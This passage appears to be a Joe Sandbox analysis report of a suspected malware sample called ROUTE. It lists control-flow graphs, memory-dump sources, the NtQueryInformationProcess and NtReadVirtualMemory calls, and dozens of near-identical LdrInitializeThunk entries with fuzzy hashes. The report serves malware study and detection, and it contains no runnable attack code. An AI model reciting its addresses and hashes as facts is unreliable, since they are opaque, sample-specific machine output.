                                                                                                                                                                                                                          control_flow_graph 0 331f061-331f08b 1 331f0a9-331f0c8 call 3321388 call 331d0b8 0->1 2 331f08d-331f0a4 call 3321368 0->2 8 331f6c5-331f6d0 1->8 9 331f0ce-331f1da call 331ef98 call 3321388 call 33252f4 call 3310398 call 3320948 call 3310398 call 3320948 call 3323058 1->9 2->1 26 331f1e0-331f27a call 3310398 call 3320948 NtQueryInformationProcess call 3321388 call 3310398 call 3320948 9->26 27 331f6b9-331f6c0 call 331ef98 9->27 39 331f27c-331f289 26->39 40 331f28e-331f30a call 3325302 call 3310398 call 3320948 26->40 27->8 39->27 40->39 49 331f310-331f31f call 332532c 40->49 52 331f321-331f362 NtReadVirtualMemory call 3322078 49->52 53 331f36c-331f3b2 call 3310398 call 3320948 call 33239b8 49->53 56 331f367 52->56 62 331f3d1-331f4cd call 3310398 call 3320948 call 332533a call 3310398 call 3320948 call 3323378 call 3321338 * 3 call 332532c 53->62 63 331f3b4-331f3cc 53->63 56->27 86 331f4fd-331f515 call 332532c 62->86 87 331f4cf-331f4fb call 332532c call 3321338 call 332538e call 3325348 62->87 63->27 93 331f541-331f553 call 3321fb8 86->93 94 331f517-331f53c call 3322b28 86->94 99 331f558-331f562 87->99 93->99 94->93 101 331f630-331f699 call 3310398 call 3320948 call 3323cd8 99->101 102 331f568-331f5b8 call 3310398 call 3320948 call 3323698 call 332532c 99->102 101->27 129 331f69b-331f6b4 call 3321368 101->129 120 331f5ba-331f5e3 call 33253d8 call 332538e 102->120 121 331f5ed-331f5f4 102->121 120->121 123 331f600-331f60b 121->123 124 331f5f6-331f5fe call 332532c 121->124 123->101 126 331f60d-331f62b call 3323ff8 123->126 124->101 124->123 126->101 129->27
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • NtQueryInformationProcess.NTDLL ref: 0331F228
                                                                                                                                                                                                                          • NtReadVirtualMemory.NTDLL ref: 0331F33C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462599408.0000000003310000.00000040.00000800.00020000.00000000.sdmp, Offset: 03310000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3310000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                          • API String ID: 1498878907-4108050209
                                                                                                                                                                                                                          • Opcode ID: 35e661deca725fc81b51c8031c31ae8e41b43b8af005c5c5fb0261cfaa720eb7
                                                                                                                                                                                                                          • Instruction ID: b2ffb82b98fbc27f38a03408ccb664e19f8a5820d6adbf701edb8402a8712cb1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35e661deca725fc81b51c8031c31ae8e41b43b8af005c5c5fb0261cfaa720eb7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F123D74918B8C8FDBA9EF68C894AEEB7E1FB95304F40461AD84ECB250DF349645CB41
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: fe3dbd99b9c1119ef7db47d413a62fd9b17276f92b239ee1bf40237082f825dc
                                                                                                                                                                                                                          • Instruction ID: 3d1f4b4690001ef76ac471e4f7790cb55cc66b43e64e32c0998a047224129234
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe3dbd99b9c1119ef7db47d413a62fd9b17276f92b239ee1bf40237082f825dc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C090023160544413D540B15849845C6401997E0301B51C416E0414954CCB2489566375
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: 919c84e83d15a4f8904ca66abfaf4fde55b13eed821c8ec6ec0dd704f41de79f
                                                                                                                                                                                                                          • Instruction ID: ac2a7288456015d1dddff41d727d9945f263bf478e259f6b7b8be9533e057aa7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 919c84e83d15a4f8904ca66abfaf4fde55b13eed821c8ec6ec0dd704f41de79f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A900261601144438540B1584904486601997E1301391C51AA0544960CC7288855A27D

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 153 34a2b00-34a2b0c LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: 04d0ac6555fbf83707953c6f894183ae52eaaa42a2473d7210fac4c25cf29c63
                                                                                                                                                                                                                          • Instruction ID: 25db51be43bfe1410b8f8f6b0339802ea07a25d7478afad29db61e891465aae2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04d0ac6555fbf83707953c6f894183ae52eaaa42a2473d7210fac4c25cf29c63
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3690023120508C43D540B1584504AC6002987D0305F51C416A0054A94DD7358D55B675

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 154 34a2b10-34a2b1c LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: 7fbcde50df8f8c57232a1349b77de0c14b8a5b5fb2dea82f7aa43695abd49dfc
                                                                                                                                                                                                                          • Instruction ID: a56cd83a5308172dc56b7d6b1472737ee3eb692c0e9a7409e30af57809c012d3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7fbcde50df8f8c57232a1349b77de0c14b8a5b5fb2dea82f7aa43695abd49dfc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB90023120104C03D580B15845046CA001987D1301F91C41AA0015A54DCB258A5977B5

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 157 34a2bc0-34a2bcc LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: 47a273b3a72cc9057caba289b2d1af06ec5d8aa2f5e39485aee4da9e0b05e3d4
                                                                                                                                                                                                                          • Instruction ID: 87e149ad9a9f13d7c72852241165f7b1648080220cf1728cc05d21ecde748ce9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47a273b3a72cc9057caba289b2d1af06ec5d8aa2f5e39485aee4da9e0b05e3d4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D90023120104803D500A59855086C6001987E0301F51D416A5014955EC77588917135

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 155 34a2b80-34a2b8c LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: ccf617ea04ac3507915352de4f7872dad78da8a680be7ccd691604402e524287
                                                                                                                                                                                                                          • Instruction ID: 31d762ed0fe02fd81db677ac2fce8cf303a4a3faa85be4bc76dfcec2c1b022c6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ccf617ea04ac3507915352de4f7872dad78da8a680be7ccd691604402e524287
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6090023120104C43D500A1584504BC6001987E0301F51C41BA0114A54DC725C8517535

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 156 34a2b90-34a2b9c LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: 3130023ee49baf1a93ce7fe8285f18dfad004e2600746d4559331bdbe5525acf
                                                                                                                                                                                                                          • Instruction ID: 8ca7b4525bdb107429b3cca1b40b7e960f241d3a691c7567c47de5fdecc300af
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3130023ee49baf1a93ce7fe8285f18dfad004e2600746d4559331bdbe5525acf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E9002312010CC03D510A15885047CA001987D0301F55C816A4414A58DC7A588917135

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 150 34a2a10-34a2a1c LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: e878322f89486ecf633f5923f13f050843dd9b28e8079eb453ca095fa7036ec7
                                                                                                                                                                                                                          • Instruction ID: 783b354864f696395aa4431b51288ce5ec7d6583d4c3713319a635885f5030b5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e878322f89486ecf633f5923f13f050843dd9b28e8079eb453ca095fa7036ec7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D900225221044034545E558070458B045997D6351391C41AF1406990CC73188656335

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 152 34a2ac0-34a2acc LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: 25a3ddb01eff590967d67c8476175135fde696f2416eb4f59aa22e99919bb8b3
                                                                                                                                                                                                                          • Instruction ID: 58d19b1fa9c8bd053caae6cb3cedd845071812763c0171c641836126c67f9f11
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25a3ddb01eff590967d67c8476175135fde696f2416eb4f59aa22e99919bb8b3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE90023160504C03D550B15845147C6001987D0301F51C416A0014A54DC7658A5576B5

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 151 34a2a80-34a2a8c LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: 85320d34bffa7287c43d3c951e91ce78b56f8b511b26e5535f8a2be6acb5b65f
                                                                                                                                                                                                                          • Instruction ID: bf194fa1eba039581a88f7ccd462b96641152de574677fcd16bf0e76a9d150b1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85320d34bffa7287c43d3c951e91ce78b56f8b511b26e5535f8a2be6acb5b65f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A900261202044038505B1584514696401E87E0201B51C426E1004990DC73588917139

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 149 34a29f0-34a29fc LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: 03eb3f29507dba6cdf753e8672755275e0bc00d7bb3552face1051db01512e95
                                                                                                                                                                                                                          • Instruction ID: 04916a15b661f29be3e1bfb6b05f085a8e9aa26f74d12fdb4eaba02bb0f0e798
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03eb3f29507dba6cdf753e8672755275e0bc00d7bb3552face1051db01512e95
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89900435311044034505F55C07045C7005FC7D5351351C437F1005D50CD731CC717135
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: e18efe85dda48cc48621328f6cf7aa3a4e70d610dd80b3d1a57eb156fecfdf40
                                                                                                                                                                                                                          • Instruction ID: 769209c15f39526bb1eff615662e1891afe1a6a21142d99c3e121143d81224ce
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e18efe85dda48cc48621328f6cf7aa3a4e70d610dd80b3d1a57eb156fecfdf40
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6290022121184443D600A5684D14B87001987D0303F51C51AA0144954CCB2588616535
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: d6fb4bd8878d2f1c78a256a4e802e10d0301261a0cc7ad5e46ef6b7b4b38f68b
                                                                                                                                                                                                                          • Instruction ID: b6f9126c165e5728b12c0775563838d1053887101f2bfa079adbbfa736f443cf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6fb4bd8878d2f1c78a256a4e802e10d0301261a0cc7ad5e46ef6b7b4b38f68b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A190026134104843D500A1584514B860019C7E1301F51C41AE1054954DC729CC52713A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: 37c479bb7173d10a09cb50d0016864814eea998edf1f9bcae7e158fb9faa694a
                                                                                                                                                                                                                          • Instruction ID: 91dde89cac85a188e7909a31d5a9679fd5de5220b44b48e90cfe594726621fe1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37c479bb7173d10a09cb50d0016864814eea998edf1f9bcae7e158fb9faa694a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1090026120144803D540A5584904687001987D0302F51C416A2054955ECB398C517139
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: ea84d74c552e178ee68ff6e782dff2cf2e7d952a1b4935a1c742b032ee8443aa
                                                                                                                                                                                                                          • Instruction ID: ce3195231453aef85b39f019d8cdd7a40dd45e77f238d2945a942cce712a98fe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea84d74c552e178ee68ff6e782dff2cf2e7d952a1b4935a1c742b032ee8443aa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55900221601044438540B16889449864019ABE1211751C526A0988950DC76988656679
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: 1a60240afe47bfe3ac5e8fa47b063431effb005ffb87c582ea1d422686ce695e
                                                                                                                                                                                                                          • Instruction ID: e20382be24158017023915907f0e0225bc5b18c9f16c3d119b37560dd97eb746
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a60240afe47bfe3ac5e8fa47b063431effb005ffb87c582ea1d422686ce695e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3790023120104813D511A1584604787001D87D0241F91C817A0414958DD7668952B135
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: ddc669f29769f9cea54a0de1b70fe0522ef54c39581cc20768b2e560dfc9e1b3
                                                                                                                                                                                                                          • Instruction ID: 4f32208dba795a740437d4e3a1d8763bbb19dc0335aa53297efca600e4a35ae0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ddc669f29769f9cea54a0de1b70fe0522ef54c39581cc20768b2e560dfc9e1b3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B390022160104903D501B1584504696001E87D0241F91C427A1014955ECB358992B135

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 159 34a2c50-34a2c5c LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: aac984f24416b190ac83aa4e0a5840e9cb3b07d84652d333ece93656bf701aa6
                                                                                                                                                                                                                          • Instruction ID: ba3f32b13bf1ef7cb8c3c45d2721d164baf6ab094ee1c31ff126d7ef946a9532
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aac984f24416b190ac83aa4e0a5840e9cb3b07d84652d333ece93656bf701aa6
